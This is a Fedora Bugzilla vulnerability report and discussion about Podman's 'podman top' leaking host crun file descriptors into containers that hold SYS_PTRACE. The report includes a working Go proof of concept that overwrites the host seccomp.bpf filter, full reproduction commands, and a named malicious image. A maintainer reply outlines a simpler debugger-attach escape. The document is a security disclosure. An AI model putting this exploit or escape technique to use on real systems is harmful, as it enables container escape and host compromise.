Bug 2345676

Summary:	A vulnerability in Podman and crun allows containers with SYS_PTRACE to hijack host file descriptors (e.g., seccomp.bpf via /proc/[pid]/fd) during podman top execution, enabling seccomp bypass and container escape in all environments.
Product:	[Fedora] Fedora	Reporter:	m202372036
Component:	podman	Assignee:	Lokesh Mandvekar <lsm5>
Status:	CLOSED UPSTREAM	QA Contact:	Fedora Extras Quality Assurance <extras-qa>
Severity:	medium	Docs Contact:
Priority:	unspecified
Version:	rawhide	CC:	bbaude, debarshir, dwalsh, go-sig, gscrivan, jnovy, lsm5, m202372036, mboddu, mheon, nsella, patrick, pholzing, suraj.ghimire7
Target Milestone:	---	Keywords:	Reopened
Target Release:	---
Hardware:	x86_64
OS:	Linux
Whiteboard:
Fixed In Version:		Doc Type:	If docs needed, set a value
Doc Text:		Story Points:	---
Clone Of:		Environment:
Last Closed:	2025-02-18 17:01:16 UTC	Type:	---
Regression:	---	Mount Type:	---
Documentation:	---	CRM:
Verified Versions:		Category:	---
oVirt Team:	---	RHEL 7.3 requirements from Atomic Host:
Cloudforms Team:	---	Target Upstream Version:
Embargoed:

Description m202372036 2025-02-14 05:25:02 UTC

The 'podman top' command is used to display the processes running in a container. For security concerns, this command has
a dedicated logic to interact with the container granted the SYS_PTRACE privilege. However, this logic is still vulnerable and
allows the adversary to escape from the container. Specifically, 'podman top' will call 'crun exec' to run the 'ps' in the
container when this container has the SYS_PTRACE privilege. In this case, the 'crun exec' will launch a 'crun' process and join
it into the container’s namespaces. Badly, the file descriptors that were opened before joining the container will be visible to
the processes in the container. One of these file descriptors is pointed to the file `/run/user/1000/crun/
[CONTAINER_ID]/seccomp.bpf`, and the adversary with the SYS_PTRACE privilege in the container can modify this file via
'/proc/[crun-pid]/fd' to disable the seccomp restrictions. Moreover, there are many channels under the '/proc/[crun-pid]' that
can be used to escape from the non-rootless container, such as overwriting the '/proc/PID/map_files'. Note that this attack
can affect both the non-rootless and the rootless environment.

Threat Model
The container-based platform can use Podman as the container engine and provide interfaces that encapsulate common
commands (e.g., run, cp, exec, top, etc.) for its users to manage the container. We assume that the adversaries in the
container-based platform attempt to escape from the containers, and can request the platforms via the legitimate interface
to execute commands in their containers. When the platform performs 'podman top', the adversary can exploit this
vulnerability to bypass the seccomp and gain more privileges.



Environment

Client:       Podman Engine

Version:      5.0.0-dev

API Version:  5.0.0-dev

Go Version:   go1.20.3

Git Commit:   7cb0c2ef0997bcd04159584d9801256352ec5e3a

Built:        Fri Feb  2 09:38:19 2024

OS/Arch:      linux/amd64

crun version 1.14.0.0.0.9-199a

commit: 199a32fec3a092d73660675012dfe20506a35d69

rundir: /run/user/1000/crun

spec: 1.0.0

+SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +YAJL



Reporters

Zhenchen Wang, Huazhong University of Science and Technology

Zhi Li, Huazhong University of Science and Technology

Weijie Liu, Nankai University

XiaoFeng Wang, Indiana University Bloomington


Reproducible: Always

Steps to Reproduce:
We assume that the adversary takes control of a container with the SYS_PTRACE capability. This container is restricted by
seccomp, and syscalls such as 'add_key' cannot be executed in this container.

1.     The adversary creates a malicious image containing the exploiting code (poc.go) and the new seccomp file
(seccomp-replace.bpf) that allows the add_key syscall to be used.

* cat <<EOF > poc.go

package main



import (

       "fmt"

       "io/ioutil"

       "os"

       "strconv"

       "strings"

)



func main() {

// Loop through all processes to find one whose cmdline includes crun

      var found int

      for found == 0 {

pids, err := ioutil.ReadDir("/proc")

if err != nil {

                       fmt.Println(err)

                       return

               }

               for _, f := range pids {

                       fbytes, _ := ioutil.ReadFile("/proc/" + f.Name() + "/cmdline")

                       fstring := string(fbytes)

                       if strings.Contains(fstring, "crun") {

                               fmt.Println("[+] Found the PID:", f.Name())

                               fmt.Println(fstring)

                               found, err = strconv.Atoi(f.Name())

                               if err != nil {

                                       fmt.Println(err)

                                       return

                               }

                       }

               }

       }



       fdPath := fmt.Sprintf("/proc/%d/fd", found)

       fds, err := ioutil.ReadDir(fdPath)

       if err != nil {

               fmt.Println(err)

               return

       }

       fmt.Println("[+] Open file descriptors:")

       for _, fd := range fds {

               linkPath, err := os.Readlink(fdPath + "/" + fd.Name())

               if err != nil {

                       fmt.Println(err)

               }

               fmt.Printf("   %s: %s\n", fd.Name(), linkPath)

               if strings.Contains(linkPath, "seccomp") {

                               writeHandle, _ := os.OpenFile(fdPath + "/" + fd.Name(), os.O_WRONLY|os.O_TRUNC, 0644)

                               if int(writeHandle.Fd()) > 0 {

                                       fmt.Println("[+] Successfully got write handle", writeHandle)

                                       content, _ := ioutil.ReadFile("/home/seccomp-replace.bpf")

                                       writeHandle.Write(content)

                               return

               }

               }

       }

}

EOF



* cat <<EOF > add_key.json

{

 "defaultAction": "SCMP_ACT_ALLOW",

 "syscalls": [

   {

     "names": ["add_key"],

     "action": "SCMP_ACT_ALLOW"

   }

 ]

}

EOF

* podman create -it --name=add_key --security-opt seccomp=add_key.json golang /bin/bash && podman start add_key
* mv /run/user/1000/crun/$(podman inspect -f '{{.Id}}' add_key)/seccomp.bpf ./seccomp-replace.bpf
* cat <<EOF > add_key.c

#define _GNU_SOURCE

#include <keyutils.h>

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <string.h>



int main() {

   key_serial_t keyring = KEY_SPEC_THREAD_KEYRING;

   const char *key_type = "user";

   const char *key_desc = "my_key";

   const char *key_data = "my_data";

   ssize_t key_size = strlen(key_data);



   key_serial_t key = add_key(key_type, key_desc, key_data, key_size, keyring);

   if (key < 0) {

       perror("add_key");

       exit(EXIT_FAILURE);

   }

   printf("Key created successfully with ID: %d\n", key);



   return 0;

}

EOF

* cat <<EOF > Dockerfile

FROM docker.io/library/golang:latest

WORKDIR /home

COPY poc.go poc.go

COPY add_key.c add_key.c

RUN go build poc.go

RUN apt-get update && apt-get install libkeyutils-dev && gcc add_key.c -o add_key -lkeyutils

COPY seccomp-replace.bpf /home/seccomp-replace.bpf

WORKDIR /home/

EOF

·        podman build -f Dockerfile -t poc

  This image has been pushed to DockerHub and named 'docker.io/plucky923/podmanfdpoc:v1'.

2.          The adversary runs a container with the malicious image on a container-based cloud platform. ([administrator]
means that the commands are executed outside the container, and [attacker] means the commands are executed inside
the container.)

·        [administrator] podman run -it --name=poc --cap-add=SYS_PTRACE docker.io/plucky923/podmanfdpoc:v1 /bin/bash

At this time, the adversary cannot execute the syscall add_key which is prohibited by seccomp in the container.

* [attacker] ./add_key

The adversary executes the attack code in the container.

* [attacker] ./poc

3.          The adversary requests the platform to execute a command in his container.

* [administrator] podman top -l --aux

Executing the 'podman top -l -- aux' command would allow an adversary to overwrite the 'seccomp.bpf' file on the host (If
overwriting fails, the poc and "podman top -l – aux" command needs to be executed multiple times). Then, the adversary can
request the platform again to execute the ‘add_key’ syscall in the container, and this execution will be successful at this
time.

* [administrator] podman exec -it poc ./add_key



There is the video of the poc:

https://drive.google.com/file/d/1PZjrKKu8gSCBL92DHQotlBwBaTHVxE2A/view?usp=sharing
Actual Results:  
Containers can escape seccomp restrictions

Expected Results:  
1. **Podman Vulnerability Confirmation:**
   - When executing `podman top` on a container with the `SYS_PTRACE` capability, the host process (e.g., `crun`) will leak critical file descriptors (e.g., `seccomp.bpf`) into the container’s namespace.
   - Attackers can exploit this leakage to bypass seccomp filters, escalate privileges, and escape the container in **both rootless and rootful modes**.

2. **Docker Security Comparison:**
   - Docker containers with `SYS_PTRACE` **cannot** achieve similar attacks due to Docker’s default **AppArmor profile**, which explicitly restricts access to `/proc/[pid]/fd` entries. For example:
     ```
     deny /proc/**/fd/* rwxlk,
     ```
     This prevents containers from accessing or modifying host file descriptors, even if the capability is granted.

3. **Proposed Fix for Podman:**
   - Podman should closes all non-essential and dangerous file descriptors before executing processes inside the container.
   - Stricter permissions on dangerous file descriptors.

This demonstrates that while Podman attempts to handle `SYS_PTRACE` securely, the current implementation remains flawed, and Docker’s defense-in-depth approach (via AppArmor) provides stronger protection against such attacks.

We found that the "podman top" command provides dedicated code [1] to handle containers with the "SYS_PTRACE" capability in a more secure manner (declared by the accompanying comment in the code). Does this mean Podman still care about the security issues caused by the payloads in privileged containers?




Further, our study shows that this dedicated code for security is still vulnerable, leading to the leakage of the fd on the host. It is unreasonable to ignore this security issue in that code written for security. 




In this dedicated "security" code, Podman triggers the crun to execute a 'ps' binary in the container, rather than calling the ps(1) utility in the host. However, the host fd will be leaked to the container in this process. We believe this leakage channel should be eliminated, just like the  'crun exec' commit [2] that patches 'crun' and closes all fds.




For these reasons, we think our reported issue is a vulnerability that needs to be fixed.




[1] https://github.com/containers/podman/blob/main/libpod/container_top_linux.go#L240

[2] https://github.com/containers/crun/commit/f157e80374c7d8df851ee6210cfd47d5d0e9989e

Comment 1 Giuseppe Scrivano 2025-02-14 11:02:09 UTC

how many times are you going to report the same "issue" through different channels?

As I've already explained in the past, this is not a security issue, there is no way to protect the host when using CAP_SYS_PTRACE.  If you pass that capability, you know that the container payload is trusted, it is equivalent to running on the host.

You don't need such complicated attacks with SYS_PTRACE.  You can simply attach a debugger to the exec'ed process as soon as it enters the namespace and run any command from there.

It is enough you install gdb in your container, then attach the crun process as soon as it enters the PID namespace, at this point there is no seccomp profile in place as well as many other security measures (selinux, apparmor, capabilities...):

Comment 2 m202372036 2025-02-16 08:25:43 UTC

(In reply to Giuseppe Scrivano from comment #1)
> how many times are you going to report the same "issue" through different
> channels?
> 
> As I've already explained in the past, this is not a security issue, there
> is no way to protect the host when using CAP_SYS_PTRACE.  If you pass that
> capability, you know that the container payload is trusted, it is equivalent
> to running on the host.
> 
> You don't need such complicated attacks with SYS_PTRACE.  You can simply
> attach a debugger to the exec'ed process as soon as it enters the namespace
> and run any command from there.
> 
> It is enough you install gdb in your container, then attach the crun process
> as soon as it enters the PID namespace, at this point there is no seccomp
> profile in place as well as many other security measures (selinux, apparmor,
> capabilities...):

We've adhered to community protocols by reporting this twice via email, only to face repeated dismissal. Your persistent refusal to acknowledge the issue forces public discourse.

It is difficult to assume that all images used by users are so-called "trusted". In fact, even on personal computers, developers or testers need to download images from DockerHub. You cannot shift the security responsibility to users to avoid this design security issue. If this function is not designed to be secure, once a user accidentally uses a malicious image, it will inevitably cause an escape problem.

Either engineer proper safeguards for CAP_SYS_PTRACE implementations or issue unambiguous warnings in documentation. Your current posture amounts to negligence: When (not if) users encounter malicious images through routine workflows, container escapes become inevitable. Security through willful ignorance isn't security at all.

Comment 3 Giuseppe Scrivano 2025-02-17 11:57:28 UTC

Nobody is proposing to trust all the images you pull from a remote registry, I am just saying to not give capabilities to containers you don't trust.

You've proposed a complicated attack that works only when CAP_SYS_PTRACE is granted. You don't need such a complicated attack once you have CAP_SYS_PTRACE, you can attach to a process as soon as it enters the PID namespace. That is done by `podman top` as well as `podman exec` on every healthcheck.

It is a well known attack vector, there is nothing new. Just look for "cap_sys_ptrace container escape" on Google.

There is a reason why we drop some capabilities by default. If you add them back you are loosening the protection offered by the runtime. Don't grant capabilities if you don't know what you are doing.

In this case, you have added a capability like CAP_SYS_PTRACE, that turns your container into a privileged container:

--privileged
Give extended privileges to this container. The default is false.

By default, Podman containers are unprivileged (=false) and cannot, for example, modify parts of the operating system. This is because by default a container is only allowed limited access to devices. A "privileged" container is given the same ac‐
cess to devices as the user launching the container, with the exception of virtual consoles (/dev/tty\d+) when running in systemd mode (--systemd=always).

A privileged container turns off the security features that isolate the container from the host. Dropped Capabilities, limited devices, read-only mount points, Apparmor/SELinux separation, and Seccomp filters are all disabled. Due to the disabled
security features, the privileged field should almost never be set as containers can easily break out of confinement.

Comment 4 Giuseppe Scrivano 2025-02-18 17:01:16 UTC

documented upstream that there is a risk involved using these capabilities: https://github.com/containers/podman/pull/25348

Thanks